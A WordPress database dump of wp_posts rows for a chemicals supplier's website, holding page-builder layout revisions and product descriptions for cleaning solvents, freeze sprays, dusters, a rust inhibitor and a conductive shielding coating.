INSERT INTO `wp_posts` VALUES (1701, 3, '2016-09-15 19:05:10', '2016-09-15 19:05:10', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n[divider]\n\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-15 19:05:10', '2016-09-15 19:05:10', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1703, 2, '2016-09-15 19:10:21', '2016-09-15 19:10:21', '', 'glass-cleaners', '', 'inherit', 'open', 'closed', '', 'glass-cleaners', '', '', '2016-09-15 19:10:21', '2016-09-15 19:10:21', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/glass-cleaners.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1704, 3, '2016-09-15 19:11:41', '2016-09-15 19:11:41', '<p>[product_categories number="10" parent="0" columns="8" title="Our categories"]</p>\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60"]\n\n<p class="alt-font lead"><strong><em><span class="fancy-underline">INTRODUCING</span></em></strong></p>\n[divider]\n\n<h1><strong>ReleaSys ™ </strong></h1>\n<h4 class="thin-font">Semi-Permanent Mold Release</h4>\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-09-15 19:11:41', '2016-09-15 19:11:41', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1705, 2, '2016-09-15 19:19:46', '2016-09-15 19:19:46', 'A nonflammable precision cleaning solvent for critical cleaning of electronic components, circuits, precision instruments, electrical contacts, relays, and switching\r\ndevices. Excellent for cleaning oils, grease, oxidation, and operating erosion dust. Evaporates quickly and leaves no residue. It replaces HCFC-225 in many applications.', 'MS-580N/582N', '<strong>Ideal for Light Contaminants and Oils.</strong>\r\n\r\nA nonflammable and economical precision cleaning solvent for critical cleaning of electronic components, circuits, precision instruments, electrical contacts, relays and switching devices. Removes oils, oxidation and operating erosion dust. Evaporates quickly. Leaves no residue. No ODC (ozone depleting chemicals).', 'publish', 'open', 'closed', '', 'ms-580582', '', '', '2016-09-23 17:52:19', '2016-09-23 17:52:19', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1705', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1706, 2, '2016-09-15 19:27:25', '2016-09-15 19:27:25', 'A precision cleaning solvent that safely and quickly cleans electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Removes oils, oxidation, and operating erosion dust. Safe for plastics including acrylic, polycarbonate, polystyrene and ABS. Safe for most elastomers and metals including zinc and magnesium. Evaporates quickly and leaves no residue.', 'MS-720/722', '<strong>Ideal for Light Contaminants and Oils.</strong>\r\n\r\nA precision cleaning agent containing a Hydrofluoroether (HFE). Safe and quickly cleans electronic components and circuits, precision instruments, switches, relays and contacts. Removes oils, oxidation and operating erosion dust. Safe for most plastics including acrylic, polycarbonate, polystyrene and ABS. Safe for most elastomers and metals including zinc and magnesium. Leaves no residue. No ODC (ozone depleting chemicals). NSN 6850-01-519-1819.', 'publish', 'open', 'closed', '', 'ms-720722', '', '', '2016-09-19 15:44:25', '2016-09-19 15:44:25', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1706', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1707, 2, '2016-09-15 19:35:22', '2016-09-15 19:35:22', '<h1><strong>MS-720L Precision Cleaning Agent</strong></h1>\r\nA precision cleaning solvent that safety and quickly cleans electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Removes oils, oxidation, and operating erosion\r\ndust. Safe for plastics including polycarbonate and ABS. Safe for most elastomers and metals including zinc and magnesium.\r\n\r\n<strong>ADVANTAGES</strong>\r\n<ul>\r\n 	<li>Ultra-Low Global Warming Potential</li>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Safe for most plastics, electronics and metals</li>\r\n 	<li>RoHS compliant</li>\r\n</ul>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Boiling Point</td>\r\n<td style="text-align: center;" width="206">70°F/21°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">1.17 g/ml @ 54°F/12°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content</td>\r\n<td style="text-align: center;">140 g/liter</td>\r\n</tr>\r\n<tr>\r\n<td>Global Warming Potential</td>\r\n<td style="text-align: center;">5.9</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion Potential</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content</td>\r\n<td style="text-align: center;">128 g/l</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>PLASTIC COMPATIBILITY</strong>\r\n(Immersion: 2 weeks)\r\n<ul>\r\n 	<li>ABS</li>\r\n 	<li>HD Polyethylene</li>\r\n 	<li>Polypropylene</li>\r\n 	<li>PTFE</li>\r\n 	<li>PVD</li>\r\n 	<li>Nylon 66</li>\r\n 	<li>ACETAL</li>\r\n 	<li>Polycarbonate</li>\r\n 	<li>PET</li>\r\n 	<li>PVC</li>\r\n</ul>\r\n<strong>ELASTOMER COMPATIBILITY</strong>\r\n(Immersion: 2 weeks)\r\n<ul>\r\n 	<li>Butyl Rubber</li>\r\n 	<li>Natural Rubber</li>\r\n 	<li>Viton™ B</li>\r\n 	<li>Neoprene</li>\r\n</ul>\r\n<strong>METAL COMPATIBILITY</strong>\r\n<ul>\r\n 	<li>Aluminum</li>\r\n 	<li>Copper</li>\r\n 	<li>Carbon Steel</li>\r\n 	<li>Stainless Steel</li>\r\n 	<li>Brass</li>\r\n 	<li>Zinc</li>\r\n</ul>', 'MS-720L', '<strong>Ideal for Light Contaminants and Oils.</strong>\r\n<br/><br/>\r\nAn ultra low global warming precision cleaning solvent that safely and quickly cleans electronic components, circuits, precision instruments, switches and relays. Removes oils, oxidation and operating erosion dust. Safe for most plastics, elastomers and metals. Leaves no residue.\r\n<br/><br/>\r\n<img class="size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'publish', 'open', 'closed', '', 'ms-720l', '', '', '2016-10-27 15:43:10', '2016-10-27 15:43:10', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1707', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1708, 2, '2016-09-15 19:57:37', '2016-09-15 19:57:37', 'MS-760 and MS-762 Cleaning Agent is a special solvent blend of a hydrofluorocarbon fluid and isopropanol. It is intended for use in the removal of water from nonporous surfaces, as well as cleaning particulate and ionic soils from component parts. This product offers solvency for polar soils, while maintaining excellent compatibility with most plastics and metals. Typical applications include absorption drying, precision and specialty cleaning and rinsing for removing particulates, fingerprints and light soils, from metal, plastic and glass parts. It is an ideal choice for absorption drying where nested parts or complex geometries make water removal difficult or energy intensive.', 'MS-760/762', '<strong>Removal of water from nonporous surfaces, particulates, and ionic soils.</strong>\r\n\r\nThis product offers solvency for polar soils, while maintaining excellent compatibility with most plastics and metals. Typical applications include absorption drying, precision and speciality cleaning and rinsing for removing particulates, fingerprints and light soils, from metal, plastic and glass parts. It is an ideal choice for absorption drying where nested parts or complex geometries make water removal difficult or energy intensive.', 'publish', 'open', 'closed', '', 'ms-760762', '', '', '2016-09-19 15:45:45', '2016-09-19 15:45:45', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1708', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1709, 2, '2016-09-16 12:29:03', '2016-09-16 12:29:03', 'MS-760 and MS-762 Cleaning Agent is a special solvent blend of a hydrofluorocarbon fluid and isopropanol. It is intended for use in the removal of water from nonporous surfaces, as well as cleaning particulate and ionic soils from component parts. This product offers solvency for polar soils, while maintaining excellent compatibility with most plastics and metals. Typical applications include absorption drying, precision and specialty cleaning and rinsing for removing particulates, fingerprints and light soils, from metal, plastic and glass parts. It is an ideal choice for absorption drying where nested parts or complex geometries make water removal difficult or energy intensive.', 'MS-760/762', '<strong>Removal of water from nonporous surfaces, particulates, and ionic soils.</strong>\n<br /><br />\nThis product offers solvency for polar soils, while maintaining excellent compatibility with most plastics and metals. Typical applications include absorption drying, precision and speciality cleaning and rinsing for removing particulates, fingerprints and light soils, from metal, plastic and glass parts. It is an ideal choice for absorption drying where nested parts or complex geometries make water removal difficult or energy intensive.', 'inherit', 'closed', 'closed', '', '1708-autosave-v1', '', '', '2016-09-16 12:29:03', '2016-09-16 12:29:03', '', 1708, 'https://132.148.10.86/wordpress/1708-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1710, 2, '2016-09-16 12:51:46', '2016-09-16 12:51:46', 'This product offers solvency for polar soils, while maintaining excellent compatibility with most plastics and metals. It is ideally suited for precision and specialty cleaning and rinsing. Typical applications include removing particulates, fingerprints and ionic salts, from metal, plastic and glass parts.', 'MS-765/767', '<strong>Removes Ionic Salts, Light Oils and Particulates.</strong>\r\n\r\nA nonflammable, azeotrope of a hydrocarbon fluid with methanol. It offers improved solvency for polar soils, while maintaining excellent compatibility with most plastics, ceramics and metals. It is ideally suited for precision and specialty cleaning and rinsing. Removes particulate matter, light oils, fingerprints and light ionic soils from metal, plastic and glass. It can replace hydrochlorofluorocarbons (HCFCs) in many applications. Unique properties include high density, low viscosity, and low-surface tension for effective particle and soil removal. Ideal for use in vapor degreasing equipment. No ODC (ozone depleting chemicals).', 'publish', 'open', 'closed', '', 'ms-765767', '', '', '2016-09-19 15:47:05', '2016-09-19 15:47:05', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1710', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1711, 2, '2016-09-16 13:19:58', '2016-09-16 13:19:58', 'PFPE Re-Move™ is a superior solvent cleaner designed to remove all grades of fluorinated lubricants, including KrytoxTM, Castrol Braycote®, Kluber®, Fomblin® and Nye®. This cleaner is for applications where these lubricants need to be completely removed from the surface. Safe for most plastics, elastomers and metals.', 'PFPE Re-Move™ MS 250/252 Krytox Cleaner', '<strong>Removes all grades of fluorinated lubricants.</strong>\r\n\r\nA superior solvent cleaner designed to remove all grades of fluorinated lubricants. This cleaner is for applications where the PFPE Lubricant must be completely removed from the surface. It is safe for most plastics, metals, and elastomers.', 'publish', 'open', 'closed', '', 'pfpe-re-move-ms-250252', '', '', '2017-05-01 13:33:09', '2017-05-01 13:33:09', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1711', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1712, 2, '2016-09-16 13:39:18', '2016-09-16 13:39:18', 'Surface PrepClean™ is a strong cleaning agent designed to clean surfaces prior to applying fluorinated lubricants like Krytox. New, unlubricated components and bearings are typically coated with hydrocarbon-based rust preventative oils to prevent corrosion during storage. Prior to lubricating components and bearings with fluorinated lubricants, it is important to remove these preservatives, because standard rust preventative materials will lower adhesion and reduce the effectiveness of fluorinated oils and greases.\r\n\r\nPrepClean™ can also be used to clean surfaces like PCBs, prior to applying Conformal Coating like our Silicone MS-460H/MS-462H, Acrylic MS-465C/MS-467C, MS-475C/MS-477C and Urethane MS-470C/MS-472C. Also great for cleaning surfaces prior to applying adhesives. Is effective in removing difficult soils like heavy oils, grease, wax and other contaminants. It is an excellent replacement for nPB, HCFC-225, 1,1,1-trichloroethane (1,1,1-TCA) and hydrochlorofluorocarbons (HCFCs) in many applications. MS-\r\n257 can be used in vapor degreasing equipment.', 'Surface PrepClean™ MS-255/257', '<strong>To remove oil, grease, wax and other contaminates.</strong>\r\n\r\nA strong cleaning agent designated to clean surfaces prior to applying lubricants, coating and adhesives. It removes difficult soils such as heavy oil, grease, wax, and other contaminates.', 'publish', 'open', 'closed', '', 'surface-prepclean-ms-255257', '', '', '2016-09-16 19:42:45', '2016-09-16 19:42:45', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1712', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1713, 2, '2016-09-16 13:45:00', '2016-09-16 13:45:00', 'IPA Clean, MS-280 and MS-282 are high purity cleaning solvents. They are 99.8% pure anhydrous Isopropyl Alcohol (IPA) that is excellent for cleaning many types of\r\ncontaminants from multiple surfaces, like electronics, plastics, elastomers, metals and wood. Removes water, fluxes, oils, light grease, oxides, organic residues, ionic deposits, some residual glues, some paints, and particulates.', 'MS-280/282', '<strong>Excellent for removing many types of contaminants.</strong>\r\n\r\n99.8% pure anhydrous isopropyl alcohol that is excellent for removing many types of contaminants from multiple surfaces, like electronics, plastics, elastomers, metal, and wood.', 'publish', 'open', 'closed', '', 'ms-280282', '', '', '2016-09-19 15:41:37', '2016-09-19 15:41:37', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1713', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1714, 2, '2016-09-16 16:48:39', '2016-09-16 16:48:39', '', 'solvents-solvsys', '', 'inherit', 'open', 'closed', '', 'solvents-solvsys', '', '', '2016-09-16 16:48:39', '2016-09-16 16:48:39', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/solvents-solvsys.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1715, 2, '2016-09-16 17:22:13', '2016-09-16 17:22:13', 'MSAlso available in a low global warming formulation. The MS-222L a high purity product with no traces of contaminates and oils, which is essential for critical applications. Removes microscopic dust. Recommended for electro-mechanical instruments, computer equipment, optics and other equipment. May be used with the MS-228 Cobra® Duster extension for use in hard to reach areas. Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).\n<table width="399">\n<tbody>\n<tr>\n<td width="219">Molecular Weight</td>\n<td style="text-align: center;" width="180">115</td>\n</tr>\n<tr>\n<td>Boiling Point</td>\n<td style="text-align: center;">-19°C</td>\n</tr>\n<tr>\n<td>Vapor Pressure (mmHg)</td>\n<td style="text-align: center;">60.8 psia @ 20°C</td>\n</tr>\n<tr>\n<td>Density</td>\n<td style="text-align: center;">1.17 @ 21.1°C</td>\n</tr>\n<tr>\n<td>VOC</td>\n<td style="text-align: center;">Exempt</td>\n</tr>\n<tr>\n<td>ODP</td>\n<td style="text-align: center;">0</td>\n</tr>\n<tr>\n<td>GWP</td>\n<td style="text-align: center;">0</td>\n</tr>\n</tbody>\n</table>', 'AeroDuster® MS-222N', 'The convenient nonflammable way to remove microscopic dust. Recommended for electromechanical instruments, computer equipment, and optics. High purity. May be used with MS-228 Cobra® Duster extension for use in hard to reach areas. No ODC (ozone depleting chemicals). NSN 6850-01-346-9144 (14 oz)', 'inherit', 'closed', 'closed', '', '489-autosave-v1', '', '', '2016-09-16 17:22:13', '2016-09-16 17:22:13', '', 489, 'https://132.148.10.86/wordpress/489-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1716, 2, '2016-09-16 16:53:51', '2016-09-16 16:53:51', '', 'aero-duster', '', 'inherit', 'open', 'closed', '', 'aero-duster', '', '', '2016-09-16 16:53:51', '2016-09-16 16:53:51', '', 489, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/aero-duster.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1717, 2, '2016-09-16 16:58:00', '2016-09-16 16:58:00', 'Aero Duster MS-222N', 'Aero Duster MS-222N', 'Aero Duster MS-222N', 'inherit', 'open', 'closed', '', 'aero-dusters', '', '', '2016-11-12 14:10:40', '2016-11-12 14:10:40', '', 489, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/aero-dusters.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1719, 2, '2016-09-16 17:14:36', '2016-09-16 17:14:36', '<strong>Quik-Freeze MS-242L (Low Global Warming): </strong>\r\n<p class="h10">For hot intermittence testing of electronic components and protection of components during soldering. Excellent for cooling epoxy in composite forming and reducing tack in prepreg applications. Also used for freezing biological specimens. Instantly freezes small area to -54ºF(-47ºC) Compatible with most plastics, rubbers and metals. Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).</p>\r\n\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Molecular Weight</td>\r\n<td style="text-align: center;" width="180">115</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">-19°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure (mmHg)</td>\r\n<td style="text-align: center;">60.8 psia @ 20°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">1.17 @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td style="text-align: center;">Exempt</td>\r\n</tr>\r\n<tr>\r\n<td>ODP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>GWP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Quik-Freeze® MS-242N', 'For hot-cold intermittence testing of electronic components and protection of components during soldering. Excellent for cooling epoxy in composite forming and reducing tack in prepreg applications. Also used for freezing biological specimens. Instantly freezes small areas to -55°F/-48°C. Compatible with most plastics, rubbers and metals. Nonflammable. No ODC (ozone depleting chemicals). NSN 6850-01-333-1841.', 'publish', 'open', 'closed', '', 'quik-freeze', '', '', '2016-10-17 18:53:53', '2016-10-17 18:53:53', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1719', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1720, 2, '2016-09-16 17:13:29', '2016-09-16 17:13:29', 'Quik-Freeze ', 'quik-freeze', 'Quik-Freeze ', 'inherit', 'open', 'closed', '', 'quik-freeze', '', '', '2016-10-17 18:53:20', '2016-10-17 18:53:20', '', 1719, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/quik-freeze.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1721, 2, '2016-09-16 17:19:21', '2016-09-16 17:19:21', '<strong>MS-242L (Low Global Warming): </strong>\n<p class="h10">For hot intermittence testing of electronic components and protection of components during soldering. Excellent for cooling epoxy in composite forming and reducing tack in prepreg applications. Also used for freezing biological specimens. Instantly freezes small area to -54ºF(-47ºC) Compatible with most plastics, rubbers and metals. Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).</p>\n<p class="h10"></p>', 'Quik-Freeze® MS-242N', 'For hot-cold intermittence testing of electronic components and protection of components during soldering. Excellent for cooling epoxy in composite forming and reducing tack in prepreg applications. Also used for freezing biological specimens. Instantly freezes small areas to -55°F/-48°C. Compatible with most plastics, rubbers and metals. Nonflammable. No ODC (ozone depleting chemicals). NSN 6850-01-333-1841.\n\n', 'inherit', 'closed', 'closed', '', '1719-autosave-v1', '', '', '2016-09-16 17:19:21', '2016-09-16 17:19:21', '', 1719, 'https://132.148.10.86/wordpress/1719-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1722, 2, '2016-09-16 17:42:46', '2016-09-16 17:42:46', 'Miller-Stephenson\'s Nickel Conductive Coatings offers superior protection and shielding in a fast drying and curing formulation. These Nickel Conductive Coatings allow the greater use of plastic enclosures/housings in manufacturing digital electronic devices has increased the need for reliable EMI/RFI coating solutions. A range of compounds have been developed that offer different conductive fillers to provide numerous resistance and attenuation levels. These systems can be applied by brushing and conventional spray techniques. Benefits of Miller-Stephenson Conductive Coating is the following:\r\n<ul>\r\n 	<li>Protect electronic devices from electromagnetic pulses</li>\r\n 	<li>Superior shielding performance</li>\r\n 	<li>Minimal tack free time</li>\r\n 	<li>Cost effective alternative to other shielding methods</li>\r\n 	<li>Provide uniform thickness</li>\r\n 	<li>Anti-static</li>\r\n 	<li>Exceptional point to point resistivity</li>\r\n 	<li>For high and low volume applications</li>\r\n</ul>\r\nAn excellent way to limit EMI/RFI emissions is with a Miller-Stephenson\'s Nickel Conductive Coatings. MS-478G is a black coating, which may be applied in a 2 mil layer to absorb EMI/RFI over a broad frequency range. MS-478G is general purpose shielding spray for use on plastic electronics enclosures. Consists of a tough, durable acrylic base pigmented with high quality nickel flakes. This coating can be used effectively with Acrylic, Polycarbonate, ABS, Polystyrene, PVC and other plastics.\r\n\r\nRFI Nickel Conductive Coating can be applied by dipping, brushing and/or spraying. For best results when spraying, maintain pressure between 20-30 psi; adjust nozzle for acceptable spray pattern. Several light coats (2-3) applied from a distance of 10-12 inches will provide a 1.5-2.0 mil coating. Allow each coating to dry for 30 minutes before applying another coat. Do not dilute or contaminate with water.\r\n\r\nApplication for Miller-Stephenson\'s Conductive Coating include pad printing, screen-printing, spraying, dipping and syringe dispensing. Products can be applied to flexible or rigid substrates and can be printed on uneven or contoured surfaces. They feature good adhesion to a variety of substrates including Kapton, Mylar, glass and ceramics.\r\n\r\nAgitate material before and during use to prevent settling of the active ingredients. Apply to a clean, dry surface in a well-ventilated area at temperatures between 70-85ºF.\r\n\r\n&nbsp;', 'RFI / EMI Nickel Conductive Coating (MS-485G / MS-487G)', 'A nonflammable conductive coating that shields RFI / EMI emissions over a broad range of frequencies. Coating is dry and functional within minutes of application. Recommended for application on plastic housings, enclosures, and resins. This coating can be used effectively with acrylic, polycarbonate, ABS, polystyrene, PVC and other plastics. 100% non-flammable and contains no ODC (ozone depleting chemicals).', 'publish', 'open', 'closed', '', 'conductive-coating', '', '', '2017-01-13 16:58:36', '2017-01-13 16:58:36', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1722', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1723, 2, '2016-09-16 17:42:26', '2016-09-16 17:42:26', 'Conductive coating', 'Conductive coating', '', 'inherit', 'open', 'closed', '', 'rfi-nickel-coating', '', '', '2016-10-12 19:02:25', '2016-10-12 19:02:25', '', 1722, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/rfi-nickel-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1724, 2, '2016-09-16 17:50:51', '2016-09-16 17:50:51', '', 'En-Rust™ Rust Inhibitor', 'En-Rust™ is an aerosol product designed for convenient use in many industrial applications. It contains a high performance rust and corrosion inhibitor. Low GWP (low global warming potential). VOC exempt.', 'publish', 'open', 'closed', '', 'rust-inhibitor', '', '', '2016-09-26 18:08:16', '2016-09-26 18:08:16', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1724', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1725, 2, '2016-09-16 17:50:25', '2016-09-16 17:50:25', '', 'rust-inhibitor', '', 'inherit', 'open', 'closed', '', 'rust-inhibitor', '', '', '2016-09-16 17:50:25', '2016-09-16 17:50:25', '', 1724, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/rust-inhibitor.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1726, 2, '2016-09-16 18:05:42', '2016-09-16 18:05:42', '<p class="h10"><strong>MS-242L-AS</strong>: Same general application as MS-242L but with an antistatic agent. Not recommended for freezing biological specimens. Helps dissipate any static charges which may build up during spray. Instantly freezes small areas to -50°F(-45°C). Compatible with most plastics, rubbers and metals.  Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).</p>', 'Antistatic Quik-Freeze®', 'Same general application as MS-242N but with an antistatic agent. Helps dissipate any static charges which may build up during spray. Instantly freezes small areas to -40°F/-40°C. Compatible with most plastics, rubbers and metals. Nonflammable. No ODC (ozone depleting chemicals).', 'publish', 'open', 'closed', '', 'quik-freeze-antistatic', '', '', '2016-09-29 17:47:46', '2016-09-29 17:47:46', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1726', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1728, 2, '2016-09-16 18:07:18', '2016-09-16 18:07:18', '', 'quik-freeze-anti-static', '', 'inherit', 'open', 'closed', '', 'quik-freeze-anti-static', '', '', '2016-09-16 18:07:18', '2016-09-16 18:07:18', '', 1726, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/quik-freeze-anti-static.jpg', 0, 'attachment', 'image/jpeg', 0); 
